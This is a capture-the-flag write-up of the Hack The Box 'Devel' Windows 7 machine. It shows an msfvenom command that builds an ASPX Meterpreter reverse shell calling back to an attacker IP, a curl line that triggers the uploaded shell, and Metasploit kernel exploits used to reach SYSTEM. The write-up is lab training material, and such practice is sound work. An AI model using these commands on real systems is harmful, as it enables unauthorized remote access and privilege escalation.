10.10.10.5 - Devel - Windows 7
ASPX reverse shell and Metasploit Enumeration
Summary: vulnerable software : MSII/7.5 ftp webroot exposed and writable system vulnerable : 10.10.10.5 vulnerability explanation : privilege escalation: kernel pool overflow in Win32k severity : critical
Enumeration:
Nmap shows that Microsoft FTP server is used to provide web content of the wwwroot folder. This can be dangerous if the server allows read and write access to its folder. It seems like it does in this case:
Filezilla showing uploaded shell.aspx crafted by an attacker.
Instructions for creating a shell:
1
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.16 lport=4443 -f aspx > shell.aspx
Copied!
Once we trigger the uploaded shell we get a connection back from the server:
1
curl -k http://10.10.10.5/shell.aspx
Copied!
Next we run local_exploit_suggester to find possible kernel privilege escalation methods on this Windows 7 Box.
1
meterpreter > sysinfo
2
Computer : DEVEL
3
OS : Windows 7 (Build 7600).
4
Architecture : x86
5
System Language : el_GR
6
Domain : HTB
7
Logged On Users : 0
8
Meterpreter : x86/windows
9
Copied!
Metasploit exploit_suggester came up with few exploit matching the architecture of the victim:
Metasploit local enumeration
Due to unpatched system being put in place many of the above suggestions were successfully executed on the target providing potential attacker with the NT_AUTHORITY level account:
MS16/075 - Also known as juicy potato
MS13-053
Screenshot from 2019-02-18 22-46-45
MS14_058
Copy link